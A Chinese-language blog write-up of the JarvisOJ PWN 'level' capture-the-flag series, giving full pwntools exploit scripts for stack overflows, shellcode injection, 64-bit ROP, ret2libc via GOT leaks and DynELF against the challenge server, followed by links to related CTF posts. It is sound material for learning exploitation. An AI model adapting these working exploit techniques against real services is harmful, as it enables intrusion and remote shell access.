JarvisOJ PWN level系列 wp

原創 苗_ 2020-02-21 10:19

菜菜的小白最近學習pwn,做了Jarvis上的一些題目進行練習,也從很多師傅的博客裏學習到了很多新的知識,今天重新溫習並且總結一下,以下的wp可能會比較詳細,大佬可略:

level0

這一題的難度還是蠻容易的,首先拖進ida裏,發現有'/bin/sh/字符串和system函數,然後找溢出點,發現read函數這裏發生溢出,只給了0x88的內存,但是卻要讀0x200個字節,必溢出:

然後構造一個溢出,讓返回地址變成指定的地址(即system函數的地址),寫一個腳本就可以getshell了:

# -*- coding:utf-8 -*-
from pwn import *


sh = remote("pwn2.jarvisoj.com",9881) 
junk = 'a'*0x80


fakebp = 'a'*8
syscall = 0x0000000000400596
payload = junk + fakebp + p64(syscall)
sh.send(payload)
sh.interactive()

level1

拖進ida裏進行查看:

先確認一下思路,首先發現溢出點,並且可以知道buf的地址,所以我們就要在已知的buf地址上構造shellcode。

由於棧的大小是0x88,read函數能夠讀入的範圍是0x100到buf,所以可以通過溢出來讓函數跳轉到shellcode的地址進行執行。

首先先生成一段shellcode,使用pwntools裏固有的函數進行構造:shellcode=asm(shellcraft.sh())

接着我們需要確定跳轉的地址,checksec發現該程序沒有開啓任何保護措施,所以就在緩衝區內構造shellcode並用buf作爲起始地址,下面上腳本:

from pwn import *

p = remote('pwn2.jarvisoj.com', 9877)
#p = process("./level1")
#接收從下標爲第14位到倒數第二位的字符串
text = p.recvline()[14:-2]
print text[14:-2]
#將text字符串通過int函數轉換爲16進制的地址,作爲跳轉的地址
buf_addr = int(text, 16)
shellcode = asm(shellcraft.sh())

payload = 'a' * (0x88+4-len(shellcode)) + shellcode +  p32(buf_addr)
p.send(payload)
p.interactive()

level2

拖進ida反彙編,找溢出點,發現溢出:

發現了system函數,還發現了'/bin/sh'字符串,所以可以通過把傳入參數變成'/bin/sh'然後通過調用system('/bin/sh')得到shell:

(此圖源自https://blog.csdn.net/github_36788573/article/details/80004451

注意不能在vulnerable函數的返回地址後面直接跟參數,我們需要模擬call system函數的過程,在這個過程中call有一步是將下一條指令的地址壓棧,所以我們需要構造一個假的返回地址,當然這個內容隨意。上腳本:

# -*- coding:utf-8 -*-

from pwn import * 

p = remote('pwn2.jarvisoj.com', 9878)

payload = 'a' * 0x88 + 'a' * 4 + p32(0x08048320) + p32(0xdeadbeef) + p32(0x0804A024)
#0xdeadbeef/"aaaa"爲system("/bin/sh")執行後的返回地址,可以隨便指定
p.sendlineafter("Input:\n", payload)

p.interactive()

level2_x64

結構和level2的差不多,溢出點也相同,區別在於32位的是通過棧傳參,而64位通過寄存器傳參。

所以這時我們的思路變成如何覆蓋edi的值,通過基本rop就可以做到,利用程序自己的帶有pop edi/rdi;ret語句達到給edi賦值的效果。pop edi語句是將當前的棧頂元素傳遞給edi,在執行pop語句時,只要保證棧頂元素是”/bin/sh”的地址,並將返回地址設置爲system。


————————————————
版權聲明:本文爲CSDN博主「yudhui」的原創文章,遵循 CC 4.0 BY-SA 版權協議,轉載請附上原文出處鏈接及本聲明。
原文鏈接:https://blog.csdn.net/github_36788573/article/details/80008536

思路已經清晰了,現在上腳本:

from pwn import *

p = remote('pwn2.jarvisoj.com','9882')
#p = process("./level2")

elf = ELF('./level2x64')

payload = 'a' * 0x80 + "bbbbbbbb"
pop_rdi_addr = 0x00000000004006b3
sh_addr = elf.search('/bin/sh').next()
print p64(sh_addr)
#sh_addr = 0x0000000000600A90

system_addr = elf.symbols['system']
print p64(system_addr)

junk = 'a' * 0x88

#ROPgadget --binary level2_x64 --only 'pop|ret '

payload = junk + p64(pop_rdi_addr) + p64(sh_addr) + p64(system_addr)  
p.sendline(payload)
p.interactive()

level3(return_to_libc)

首先拿到一個壓縮包,解壓之後發現程序以及libc-2.19.so文件,拖到ida裏,首先發現vul_fuction的read函數可以溢出。發現程序沒有system函數和”/bin/sh”,要如何getshell呢?

首先我們想到要獲取system函數的地址。這就需要利用到在libc.so文件中各個函數的相對位置和加載到內存中之後各個函數的相對位置相同這一特性來獲取。

我們在程序中發現了write函數,write函數可以將東西寫出來,所以我們就可以將write函數在內存中的地址泄露出來,由於system和write函數在libc.so文件中的地址是可以知道的,那麼進而我們就可以通過動態鏈接庫的特性知道system在內存中的的地址,以及”/bin/sh”在內存中的地址,於是就可以調用system(“/bin/sh”)達到獲取shell的目的。

有關plt和got表的知識參考:https://www.jianshu.com/p/0ac63c3744dd

至於write函數在內存中的地址是保存在got表中,在第二次運行write函數的時候,got表中就已經記錄了write的地址。再次返回func函數爲了是進行二次溢出,後面三個分別是wirte函數的參數 ,1表示標準輸出流stdout,中間是write是要輸出的地址,這裏要輸出writegot,4是輸出的長度,上腳本:

from pwn import * 
                                                                 
#conn=process('./level3')
conn=remote("pwn2.jarvisoj.com",9879)
libc=ELF('./libc-2.19.so')
e=ELF('./level3')
pad=0x88
vulfun_addr=0x0804844B  
write_plt=e.symbols['write'] 
#write_got=e.got['write'] 
write_got = 0x0804A018
payload1='A'*pad+"BBBB"+p32(write_plt)+p32(vulfun_addr)+p32(1)+p32(write_got)+p32(4)
#溢出地址+返回地址+參數
conn.recvuntil("Input:\n")
conn.sendline(payload1)

write_addr=u32(conn.recv(4))

#calculate the system_address in memory
libc_write=libc.symbols['write']
#libc_system=libc.symbols['system']
#libc_sh=libc.search('/bin/sh').next()
#libc_read_addr = 0x000dde30
libc_system = 0x00040310
libc_sh = 0x162d4c
system_addr=write_addr-libc_write+libc_system 
sh_addr=write_addr-libc_write+libc_sh

payload2='A'*pad+"BBBB"+p32(system_addr)+ "dead" +p32(sh_addr)
conn.sendline(payload2)
conn.interactive()

相關博客參考:https://blog.csdn.net/github_36788573/article/details/80069404

https://www.jianshu.com/p/35c757ef9d89   https://www.bbsmax.com/A/mo5kNV14Jw/

level3_x64

程序和level3的差不多,就是要注意64位程序的傳參,直接上腳本吧:

from pwn import*

#p = process('./level3x64')
p = remote('pwn2.jarvisoj.com',9883)
libc = ELF('./libc-2.19.so')
e = ELF('./level3_x64')

pop_rdi_ret = 0x00004006b3
pop_rsi_ret = 0x00004006b1
write_plt = e.plt['write']
write_got = e.got['write']
#vul_addr = e.symbols['vulnerable_function']
vul_addr = 0x4005e6
payload1 = 'a' * 0x88 + p64(pop_rdi_ret) + p64(1) + p64(pop_rsi_ret) + p64(write_got) + p64(0xdeadbeef) + p64(write_plt) + p64(vul_addr)
p.recvuntil("Input:\n")
p.sendline(payload1)

write_addr=u64(p.recv(8))
print(write_addr)

libc_write = libc.symbols['write']
libc_system = libc.symbols['system']
libc_sh = libc.search('/bin/sh').next()

system_addr = write_addr-libc_write+libc_system 
sh_addr = write_addr-libc_write+libc_sh

payload2 = 'a' * 0x88 + p64(pop_rdi_ret) + p64(sh_addr) + p64(system_addr) + p64(0xdeadbeef)

p.sendline(payload2)
p.interactive()

附件更新了....因爲這個卡了好久....枯了QAQ/

po出兩個x86和x64傳參時棧幀結構鏈接:32位:https://www.jianshu.com/p/c90530c910b0

64位:https://www.jianshu.com/p/f3ebf8a360f0

level4

拿到附件之後打開發現沒有libc文件,之後學習到用DynELF來做,利用這個模塊可以找到system的地址,但是找不到”/bin/sh”這個字符串位置,於是我們可以將其寫入bss段,然後控制read函數,通過調用read函數寫入字符串,下面上腳本。

(DynELF的相關學習鏈接:https://blog.csdn.net/qq_40827990/article/details/86689760

from pwn import *

#p = process('./level4')
p = remote('pwn2.jarvisoj.com','9880')

e = ELF('./level4')
write_plt = e.symbols['write']
vul_addr = e.symbols['vulnerable_function']
bss_addr = 0x0804A024
def leak(addr):
	payload = 'a' * 0x88 + "bbbb"
	payload += p32(write_plt)
	payload += p32(vul_addr)
	payload += p32(0x1)
	payload += p32(addr)
	payload += p32(0x4)
	p.send(payload)
	data = p.recv(4)
	return data

d = DynELF(leak,elf = e)
system_addr = d.lookup('system','libc')

#read_addr = e.symbols['read']
#read_addr = d.lookup('read','libc')
read_addr = 0x08048310
payload2 = 'a'*0x88 + "bbbb" + p32(read_addr) + p32(vul_addr) + p32(0) + p32(bss_addr) + p32(8)
p.send(payload2)
p.sendline('/bin/sh')

payload3 = 'a'*0x88 + "bbbb" + p32(system_addr) + p32(0xdeadbeef) + p32(bss_addr)
p.sendline(payload3)

p.interactive()

 

苗_
發佈了16 篇原創文章 · 獲贊 2 · 訪問量 3283
私信 關注
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

已知libc地址爆破TLS、ld.so等地址

已知libc地址爆破TLS、ld.so等地址 在大多數情況下,遠程的ld.so以及TLS等結構的地址與libc地址之間的偏移與本地的會不一樣,但是大致處於一個範圍內,並且,在同一個系統裏,這個差值是固定的,其差值的變化往往在偏移的第1.5

haivk 2020-07-05 02:32:56

ACTF_2019_ACTFNOTE(top chunk上移)

ACTF_2019_ACTFNOTE 首先,檢查一下程序的保護機制 然後,我們用IDA分析一下,edit裏存在溢出,可以直接修改top chunk的size 那麼只需要把top chunk的size修改爲-1,然後malloc(負數)

haivk 2020-07-05 02:32:56

iz_heap_lv1

iz_heap_lv1 首先,檢查一下程序的保護機制 然後,我們用IDA分析一下,delete功能裏存在數組下標越界,可以free掉第21個堆指針,而第21個位置對應name的空間 因此,我們可以在name裏僞造一個chunk,fr

haivk 2020-07-05 02:32:56

free_spirit(在棧上爆破一個可以被free的fake_chunk)

free_spirit(在棧上爆破一個可以被free的fake_chunk) 首先檢查一下程序的保護機制 然後,我們用IDA分析一下,功能3存在8字節溢出,將會把v7下面的buf指針覆蓋掉,而覆蓋了buf指針,就能實現任意地址寫。  

haivk 2020-07-05 02:32:56

pwn5 - bugku

pwn5 - bugku 前言 2019年12月15日更新 學完ROP之後,重新做一下題目。bugku 5道 pwn 挺適合在學完 ROP 之後用來練習的。 網上對 pwn5 的 wp 視乎好像不是太詳細,就做一篇比較詳細解釋的

SkYe231 2020-07-02 17:10:52

pwn題查找字符串方法記錄

記憶力不太好,簡單記錄一下,用作備忘 更新:2020年4月6日:補充更新一些方法 假設現在有文件如下: 待 Pwn 程序:mypwn libc 文件:libc.so 需要查找的字符串 /bin/sh 在上訴兩個文件中都存在

SkYe231 2020-07-02 17:10:48

PWN練習之環境變量繼承

一、環境變量參數:       在Linux/Windows操作系統中, 每個進程都有其各自的環境變量設置。 缺省情況下, 當一個進程被創建時,除了創建過程中的明確更改外, 它繼承了其父進程的絕大部分環境變量信息。 擴展的C語言main

WateranFire 2020-06-28 22:44:41

CTF-PWN練習之執行Shellcode

Shellcode 的執行可以通過製造溢出修改函數的返回地址,轉爲執行Shellcode 將python文件的輸出導入文件test: python xxx.py > test 在gdb中將test 的內容作爲輸入並運行程序至斷點處: r

WateranFire 2020-06-28 22:44:41

PWN綜合

感覺pwn的知識比較繁雜,列個目錄記錄下 堆 bins介紹 https://www.cnblogs.com/alisecurity/p/5520847.html 繞過 pie繞過 https://blog.csdn.net/Wateran

WateranFire 2020-06-28 22:44:41

pie繞過

遇到use after free之類的漏洞時,利用small bin可以獲取libc的基址,類似這種格式 p1=malloc(200); p2=malloc(200); free(p1); print(*(unsigned long l

WateranFire 2020-06-28 22:44:40

PWN問題記錄

通過系統調用execve("/bin/sh")來拿shell時,注意將rsi,rdx置0,不然可能作爲參數而導致執行出錯。

WateranFire 2020-06-28 22:44:30

pwn之fd

最近小夥伴發現了一個學習pwn的網站:http://www.pwnable.kr/。然後想着一塊進行,把做過的都記 錄下來。那麼開始第一個吧! pwn學習的遊戲網站                 1.點一下fd圖片出現:        

独木_DZ 2020-06-26 20:21:33

pwn之bof

有一兩週沒更新了,堅持...  接着前邊繼續第三篇bof. 這次讓我們直接下載bof.c,以及bof文件.分析代碼和文件,然後在pwnable.kr 9000執行,獲取flag 1.先看下bof.c的代碼: #include <st

独木_DZ 2020-06-26 20:21:23

pwn之flag

接前邊繼續開始第四個小項目flag,點開,要自己下載 Download : http://pwnable.kr/bin/flag      1.用個16進制查看器看一下,是elf文件,並且加了upx殼,要脫下upx殼纔好分析 2.利用

独木_DZ 2020-06-26 20:21:23

pwn之collision

接前篇,記錄下collision的搞法.                     1.點擊collision有如下顯示,還是ssh登錄,今天換一種登陸方式.用windows下的winscp將文件拷貝到本地.需要的在這安裝 https:/

独木_DZ 2020-06-26 20:21:22